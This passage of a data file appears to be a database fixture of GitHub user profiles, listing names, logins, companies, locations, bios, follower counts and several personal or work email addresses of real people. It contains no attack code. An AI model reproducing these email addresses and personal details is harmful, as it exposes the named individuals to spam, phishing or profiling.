"https://avatars.githubusercontent.com/u/20698852?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2016-07-28T08:12:48Z", + "updated_at": "2024-02-21T07:27:01Z", + "node_id": "MDQ6VXNlcjIwNjk4ODUy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2493, + "fields": { + "nest_created_at": "2024-09-12T01:28:36.533Z", + "nest_updated_at": "2024-09-12T01:31:58.705Z", + "name": "Joynext Cybersecurity Incident Response Team", + "login": "JN-CSIRT", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/109734641?v=4", + "company": "Joynext", + "location": "Dresden, Germany", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-07-21T10:54:24Z", + "updated_at": "2022-12-05T08:14:56Z", + "node_id": "U_kgDOBopq8Q", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2494, + "fields": { + "nest_created_at": "2024-09-12T01:28:46.712Z", + "nest_updated_at": "2024-09-22T19:42:22.039Z", + "name": "", + "login": "syalioune", + "email": "sy_alioune@yahoo.fr", + "avatar_url": "https://avatars.githubusercontent.com/u/6144741?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 34, + "created_at": "2013-12-09T17:17:11Z", + "updated_at": "2024-08-05T13:50:20Z", + "node_id": "MDQ6VXNlcjYxNDQ3NDE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2495, + "fields": { + "nest_created_at": "2024-09-12T01:28:50.152Z", + "nest_updated_at": "2024-09-12T01:28:50.152Z", + "name": "Jérôme Revillard", + "login": "jrevillard", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/203909?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 11, + "public_gists_count": 0, + "public_repositories_count": 46, + "created_at": "2010-02-15T12:26:35Z", + "updated_at": "2022-10-23T21:34:41Z", + "node_id": "MDQ6VXNlcjIwMzkwOQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2496, + "fields": { + "nest_created_at": "2024-09-12T01:28:56.895Z", + "nest_updated_at": "2024-09-12T01:28:56.895Z", + "name": "lwrtw", + "login": "LtheKing", + "email": "leonalding77@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/29225810?v=4", + "company": "xxxxxx", + "location": "indonesia", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 34, + "created_at": "2017-06-06T09:08:18Z", + "updated_at": "2024-06-18T13:39:59Z", + "node_id": "MDQ6VXNlcjI5MjI1ODEw", + "bio": "interesting in web, cloud and mobile development", + "is_hireable": false, + "twitter_username": "aldinata7" + } +}, +{ + "model": "github.user", + "pk": 2497, + "fields": { + "nest_created_at": "2024-09-12T01:28:57.715Z", + "nest_updated_at": "2024-09-12T01:28:57.715Z", + "name": "", + "login": "lauclld", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/111371568?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-08-16T15:05:50Z", + "updated_at": "2022-08-16T15:05:50Z", + "node_id": "U_kgDOBqNlMA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2498, + "fields": { + "nest_created_at": "2024-09-12T01:29:00.678Z", + "nest_updated_at": "2024-09-12T01:29:00.678Z", + "name": "brian.benavidez@biotronik.com", + "login": "benavidezb", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/51802042?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-06-13T20:36:45Z", + "updated_at": "2024-02-22T22:58:08Z", + "node_id": "MDQ6VXNlcjUxODAyMDQy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2499, + "fields": { + "nest_created_at": "2024-09-12T01:29:04.456Z", + "nest_updated_at": "2024-09-13T05:09:16.763Z", + "name": "Anderson Cruz", + "login": "andersoncruz", + "email": "anderson@linux.com", + "avatar_url": "https://avatars.githubusercontent.com/u/787814?v=4", + "company": "", + "location": "Stuttgart, Germany", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2011-05-14T13:39:24Z", + "updated_at": "2022-08-29T14:07:21Z", + "node_id": "MDQ6VXNlcjc4NzgxNA==", + "bio": "FullStack Developer / Software Craftsmanship / Opensource / Trying contribute to community and make things work.", + "is_hireable": true, + "twitter_username": "andercruz" + } +}, +{ + "model": "github.user", + "pk": 2500, + "fields": { + "nest_created_at": "2024-09-12T01:29:05.707Z", + "nest_updated_at": "2024-09-12T01:29:05.707Z", + "name": "", + "login": "luidoc", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/16059131?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2015-11-28T13:55:11Z", + "updated_at": "2024-09-11T09:55:41Z", + "node_id": "MDQ6VXNlcjE2MDU5MTMx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2501, + "fields": { + "nest_created_at": "2024-09-12T01:29:08.435Z", + "nest_updated_at": "2024-09-12T01:29:08.435Z", + "name": "Ken Poppleton", + "login": "kpopple", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13275765?v=4", + "company": "", + "location": "Salt Lake City, Utah, USA", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2015-07-10T14:51:30Z", + "updated_at": "2024-01-11T13:18:35Z", + "node_id": "MDQ6VXNlcjEzMjc1NzY1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2502, + "fields": { + "nest_created_at": "2024-09-12T01:29:12.699Z", + "nest_updated_at": "2024-09-12T02:07:23.354Z", + "name": "", + "login": "AfshinOnline", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/16746699?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2016-01-17T18:00:17Z", + "updated_at": "2024-08-21T11:28:24Z", + "node_id": "MDQ6VXNlcjE2NzQ2Njk5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2503, + "fields": { + "nest_created_at": "2024-09-12T01:29:14.400Z", + "nest_updated_at": "2024-09-12T01:29:14.400Z", + "name": "", + "login": "gray380", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/36230373?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2018-02-07T12:04:09Z", + "updated_at": "2024-06-12T14:44:03Z", + "node_id": "MDQ6VXNlcjM2MjMwMzcz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2504, + "fields": { + "nest_created_at": "2024-09-12T01:29:22.785Z", + "nest_updated_at": "2024-09-12T01:31:24.106Z", + "name": "", + "login": "sprathod369", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/73107830?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2020-10-19T10:04:27Z", + "updated_at": "2024-09-06T08:30:48Z", + "node_id": "MDQ6VXNlcjczMTA3ODMw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2505, + "fields": { + "nest_created_at": "2024-09-12T01:29:25.734Z", + "nest_updated_at": "2024-09-22T19:42:08.052Z", + "name": "", + "login": "mulder999", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1905023?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2012-06-29T06:31:36Z", + "updated_at": "2024-07-13T12:02:40Z", + "node_id": "MDQ6VXNlcjE5MDUwMjM=", + "bio": "Software architect programming since 1984", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2506, + "fields": { + "nest_created_at": "2024-09-12T01:29:29.657Z", + "nest_updated_at": "2024-09-12T01:29:29.657Z", + "name": "Wolfgang Reinhardt", + "login": "wollepb", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/435426?v=4", + "company": "", + "location": "Paderborn, Germany", + "collaborators_count": 0, + "following_count": 13, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2010-10-11T14:05:14Z", + "updated_at": "2020-04-17T08:25:49Z", + "node_id": "MDQ6VXNlcjQzNTQyNg==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2507, + "fields": { + "nest_created_at": "2024-09-12T01:29:35.113Z", + "nest_updated_at": "2024-09-12T01:29:35.113Z", + "name": "Thomas Fuerer", + "login": "tofuatjava", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3055352?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 18, + "created_at": "2012-12-16T11:52:04Z", + "updated_at": "2024-07-16T16:25:38Z", + "node_id": "MDQ6VXNlcjMwNTUzNTI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2508, + "fields": { + "nest_created_at": "2024-09-12T01:29:38.095Z", + "nest_updated_at": "2024-09-12T01:29:38.095Z", + "name": "", + "login": "itxavdimet", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/114754839?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-09-30T14:19:12Z", + "updated_at": "2022-12-01T08:03:37Z", + "node_id": "U_kgDOBtcFFw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2509, + "fields": { + "nest_created_at": "2024-09-12T01:29:43.950Z", + "nest_updated_at": "2024-09-22T19:42:19.825Z", + "name": "Sahiba Mittal", + "login": "sahibamittal", + "email": "sahiba.mittal@citi.com", + "avatar_url": "https://avatars.githubusercontent.com/u/5709882?v=4", + "company": "Citi", + "location": "Dublin, Ireland", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 8, + "public_gists_count": 0, + "public_repositories_count": 21, + "created_at": "2013-10-17T13:37:24Z", + "updated_at": "2024-03-06T17:41:37Z", + "node_id": "MDQ6VXNlcjU3MDk4ODI=", + "bio": "DevSecOps engineer in Cloud Security at Citi.", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2510, + "fields": { + "nest_created_at": "2024-09-12T01:29:47.290Z", + "nest_updated_at": "2024-09-12T01:29:47.290Z", + "name": "Goncalo Vieira", + "login": "gjfvieira", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/47488771?v=4", + "company": "", + "location": "Portugal", + "collaborators_count": 0, + "following_count": 10, + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 7, + "created_at": "2019-02-10T00:37:36Z", + "updated_at": "2024-05-10T11:44:41Z", + "node_id": "MDQ6VXNlcjQ3NDg4Nzcx", + "bio": "", + "is_hireable": false, + "twitter_username": "GJFVieira" + } +}, +{ + "model": "github.user", + "pk": 2511, + "fields": { + "nest_created_at": "2024-09-12T01:30:02.472Z", + "nest_updated_at": "2024-09-12T01:30:02.472Z", + "name": "Julian Löffler", + "login": "Breee", + "email": "julian@corewire.de", + "avatar_url": "https://avatars.githubusercontent.com/u/11966385?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 6, + "public_gists_count": 2, + "public_repositories_count": 54, + "created_at": "2015-04-15T18:04:22Z", + "updated_at": "2024-09-03T14:55:22Z", + "node_id": "MDQ6VXNlcjExOTY2Mzg1", + "bio": "I love to build stuff and automate things.\r\n\r\nCTO @corewire, K8S guy @Haufe-Group", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2512, + "fields": { + "nest_created_at": "2024-09-12T01:30:04.669Z", + "nest_updated_at": "2024-09-12T01:30:04.669Z", + "name": "", + "login": "lsoumille", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9105500?v=4", + "company": "", + "location": "Aix en Provence, France", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 7, + "public_gists_count": 6, + "public_repositories_count": 70, + "created_at": "2014-10-09T08:06:26Z", + "updated_at": "2024-05-31T08:44:26Z", + "node_id": "MDQ6VXNlcjkxMDU1MDA=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2513, + "fields": { + "nest_created_at": "2024-09-12T01:30:06.759Z", + "nest_updated_at": "2024-09-12T01:30:06.759Z", + "name": "", + "login": "dkeason", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/21960599?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2016-09-02T19:50:26Z", + "updated_at": "2024-04-25T20:38:13Z", + "node_id": "MDQ6VXNlcjIxOTYwNTk5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2514, + "fields": { + "nest_created_at": "2024-09-12T01:30:14.827Z", + "nest_updated_at": "2024-09-12T01:30:14.827Z", + "name": "Patryk Krajnik", + "login": "pattkrajnik", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/103078774?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2022-04-05T22:39:46Z", + "updated_at": "2024-08-29T08:18:42Z", + "node_id": "U_kgDOBiTbdg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2515, + "fields": { + "nest_created_at": "2024-09-12T01:30:16.486Z", + "nest_updated_at": "2024-09-12T01:30:16.486Z", + "name": "", + "login": "WeissFabian", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/50834586?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2019-05-20T13:34:32Z", + "updated_at": "2024-09-02T11:54:46Z", + "node_id": "MDQ6VXNlcjUwODM0NTg2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2516, + "fields": { + "nest_created_at": "2024-09-12T01:30:18.177Z", + "nest_updated_at": "2024-09-16T22:28:31.060Z", + "name": "", + "login": "AndreiTrW", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/82941615?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2021-04-21T09:57:54Z", + "updated_at": "2023-12-06T11:05:19Z", + "node_id": "MDQ6VXNlcjgyOTQxNjE1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2517, + "fields": { + "nest_created_at": "2024-09-12T01:30:20.351Z", + "nest_updated_at": "2024-09-12T01:30:20.351Z", + "name": "Mehrdad", + "login": "mehrdad2000", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/26499665?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 754, + "followers_count": 114, + "public_gists_count": 2, + "public_repositories_count": 31, + "created_at": "2017-03-18T07:38:05Z", + "updated_at": "2024-08-19T10:23:30Z", + "node_id": "MDQ6VXNlcjI2NDk5NjY1", + "bio": "It’s me :)", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2518, + "fields": { + "nest_created_at": "2024-09-12T01:30:23.294Z", + "nest_updated_at": "2024-09-12T01:30:23.294Z", + "name": "", + "login": "vasba", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9578779?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 42, + "created_at": "2014-11-05T21:01:50Z", + "updated_at": "2024-08-07T08:32:41Z", + "node_id": "MDQ6VXNlcjk1Nzg3Nzk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2519, + "fields": { + "nest_created_at": "2024-09-12T01:30:28.505Z", + "nest_updated_at": "2024-09-12T01:30:28.506Z", + "name": "Rajat Kumar", + "login": "rajatkumardev", + "email": "rajatsedhras@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/58552459?v=4", + "company": "@CatalystOne @IntegrationOne ", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2019-12-05T10:20:30Z", + "updated_at": "2024-08-16T06:43:28Z", + "node_id": "MDQ6VXNlcjU4NTUyNDU5", + "bio": "Site Reliability Engineer | DevOps | DevSecOps", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2520, + "fields": { + "nest_created_at": "2024-09-12T01:30:31.474Z", + "nest_updated_at": "2024-09-12T01:32:17.635Z", + "name": "S Manjunath", + "login": "trigomanju", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/110160563?v=4", + "company": "www.trigogroup.in", + "location": "Bangalore INDIA", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-07-28T08:14:42Z", + "updated_at": "2023-02-23T10:58:03Z", + "node_id": "U_kgDOBpDqsw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2521, + "fields": { + "nest_created_at": "2024-09-12T01:30:35.831Z", + "nest_updated_at": "2024-09-12T01:30:35.831Z", + "name": "Troy Marshall", + "login": "troymarshall", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7916308?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 2, + "public_repositories_count": 8, + "created_at": "2014-06-17T19:16:44Z", + "updated_at": "2024-05-21T18:09:04Z", + "node_id": "MDQ6VXNlcjc5MTYzMDg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2522, + "fields": { + "nest_created_at": "2024-09-12T01:30:42.719Z", + "nest_updated_at": "2024-09-16T22:28:33.411Z", + "name": "Daniel Mendes", + "login": "webmutation", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/761367?v=4", + "company": "European Commision", + "location": "", + "collaborators_count": 0, + "following_count": 16, + "followers_count": 10, + "public_gists_count": 7, + "public_repositories_count": 36, + "created_at": "2011-05-01T01:52:19Z", + "updated_at": "2024-09-12T19:32:23Z", + "node_id": "MDQ6VXNlcjc2MTM2Nw==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2523, + "fields": { + "nest_created_at": "2024-09-12T01:30:44.372Z", + "nest_updated_at": "2024-09-12T02:07:41.228Z", + "name": "Florian", + "login": "a5a351e7", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10687719?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2015-01-24T19:03:00Z", + "updated_at": "2024-08-28T06:31:44Z", + "node_id": "MDQ6VXNlcjEwNjg3NzE5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2524, + "fields": { + "nest_created_at": "2024-09-12T01:30:50.581Z", + "nest_updated_at": "2024-09-12T01:30:50.581Z", + "name": "Niklas Keerl", + "login": "niklaskeerl", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/33728607?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 13, + "followers_count": 21, + "public_gists_count": 21, + "public_repositories_count": 5, + "created_at": "2017-11-16T16:32:15Z", + "updated_at": "2024-08-23T16:10:07Z", + "node_id": "MDQ6VXNlcjMzNzI4NjA3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2525, + "fields": { + "nest_created_at": "2024-09-12T01:30:51.854Z", + "nest_updated_at": "2024-09-12T01:31:32.513Z", + "name": "Arnaud de Bock", + "login": "phoenixadb", + "email": "arnaud.debock@orange.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2065650?v=4", + "company": "Orange Innovation", + "location": "Rennes, France", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2012-07-30T14:55:29Z", + "updated_at": "2024-06-27T14:26:27Z", + "node_id": "MDQ6VXNlcjIwNjU2NTA=", + "bio": "Architect @Orange #Web #Mobile #Telco #Security", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2526, + "fields": { + "nest_created_at": "2024-09-12T01:30:53.916Z", + "nest_updated_at": "2024-09-12T02:07:35.712Z", + "name": "May B.", + "login": "ShuP1", + "email": "shu@wadza.fr", + "avatar_url": "https://avatars.githubusercontent.com/u/16181031?v=4", + "company": "Orange", + "location": "France", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 7, + "public_gists_count": 0, + "public_repositories_count": 45, + "created_at": "2015-12-06T22:09:31Z", + "updated_at": "2024-08-27T07:07:52Z", + "node_id": "MDQ6VXNlcjE2MTgxMDMx", + "bio": "Humanoid code generator — sh -u π", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2527, + "fields": { + "nest_created_at": "2024-09-12T01:30:57.364Z", + "nest_updated_at": "2024-09-12T01:31:20.127Z", + "name": "M van Eck", + "login": "mveck", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/35631189?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2018-01-20T14:26:11Z", + "updated_at": "2024-07-18T11:17:31Z", + "node_id": "MDQ6VXNlcjM1NjMxMTg5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2528, + "fields": { + "nest_created_at": "2024-09-12T01:31:00.383Z", + "nest_updated_at": "2024-09-22T19:42:29.379Z", + "name": "", + "login": "Mvld3r", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/26394852?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2017-03-13T23:40:41Z", + "updated_at": "2023-01-04T16:55:05Z", + "node_id": "MDQ6VXNlcjI2Mzk0ODUy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2529, + "fields": { + "nest_created_at": "2024-09-12T01:31:04.612Z", + "nest_updated_at": "2024-09-12T01:31:04.612Z", + "name": "roadSurfer", + "login": "roadSurfer", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/38717523?v=4", + "company": "", + "location": "Here", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 12, + "created_at": "2018-04-25T07:49:02Z", + "updated_at": "2024-08-10T20:10:44Z", + "node_id": "MDQ6VXNlcjM4NzE3NTIz", + "bio": "I do stuff with things", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2530, + "fields": { + "nest_created_at": "2024-09-12T01:31:05.878Z", + "nest_updated_at": "2024-09-18T00:18:12.831Z", + "name": "Mikael Carneholm", + "login": "carniz", + "email": "mikael.carneholm@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1648530?v=4", + "company": "Compio IT AB", + "location": "Trieste (Italy)", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2012-04-16T15:03:46Z", + "updated_at": "2024-09-13T16:23:42Z", + "node_id": "MDQ6VXNlcjE2NDg1MzA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2531, + "fields": { + "nest_created_at": "2024-09-12T01:31:09.571Z", + "nest_updated_at": "2024-09-12T01:31:09.571Z", + "name": "", + "login": "stefanCCS", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/61045115?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2020-02-14T08:48:08Z", + "updated_at": "2024-08-30T08:04:20Z", + "node_id": "MDQ6VXNlcjYxMDQ1MTE1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2532, + "fields": { + "nest_created_at": "2024-09-12T01:31:13.856Z", + "nest_updated_at": "2024-09-12T01:31:13.856Z", + "name": "Jonathan Share", + "login": "sharebear", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/161351?v=4", + "company": "", + "location": "Oslo, Norway", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 11, + "public_gists_count": 0, + "public_repositories_count": 25, + "created_at": "2009-12-03T11:59:36Z", + "updated_at": "2024-08-15T11:58:26Z", + "node_id": "MDQ6VXNlcjE2MTM1MQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2533, + "fields": { + "nest_created_at": "2024-09-12T01:31:16.787Z", + "nest_updated_at": "2024-09-12T01:31:16.787Z", + "name": "Security Mantra", + "login": "SecMantra", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/57031553?v=4", + "company": "Security Mantra", + "location": "India", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2019-10-26T08:15:08Z", + "updated_at": "2024-04-12T08:33:09Z", + "node_id": "MDQ6VXNlcjU3MDMxNTUz", + "bio": "Making the Cyber space more and more stronger.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2534, + "fields": { + "nest_created_at": "2024-09-12T01:31:21.598Z", + "nest_updated_at": "2024-09-12T01:31:21.598Z", + "name": "Tc", + "login": "LIFEcmd", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/66239815?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2020-06-01T06:17:27Z", + "updated_at": "2023-04-23T15:24:19Z", + "node_id": "MDQ6VXNlcjY2MjM5ODE1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2535, + "fields": { + "nest_created_at": "2024-09-12T01:31:25.762Z", + "nest_updated_at": "2024-09-12T01:33:54.284Z", + "name": "", + "login": "eL-Prova", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2064632?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 27, + "created_at": "2012-07-30T11:30:04Z", + "updated_at": "2024-07-10T09:18:21Z", + "node_id": "MDQ6VXNlcjIwNjQ2MzI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2536, + "fields": { + "nest_created_at": "2024-09-12T01:31:28.306Z", + "nest_updated_at": "2024-09-22T19:36:07.713Z", + "name": "Olaf van Zandwijk", + "login": "olafz", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/80709?v=4", + "company": "Nedap N.V.", + "location": "Enschede, The Netherlands", + "collaborators_count": 0, + "following_count": 15, + "followers_count": 31, + "public_gists_count": 3, + "public_repositories_count": 26, + "created_at": "2009-05-04T09:56:08Z", + "updated_at": "2024-05-25T16:34:36Z", + "node_id": "MDQ6VXNlcjgwNzA5", + "bio": "CISSP | Security, Infrastructure & Technology @ Nedap | AS213050", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2537, + "fields": { + "nest_created_at": "2024-09-12T01:31:30.001Z", + "nest_updated_at": "2024-09-12T01:33:55.622Z", + "name": "Robert Sirre", + "login": "Atrejoe", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/585091?v=4", + "company": "", + "location": "Rotterdam, The Netherlands", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 14, + "public_gists_count": 1, + "public_repositories_count": 38, + "created_at": "2011-01-26T18:36:14Z", + "updated_at": "2024-07-08T18:54:04Z", + "node_id": "MDQ6VXNlcjU4NTA5MQ==", + "bio": 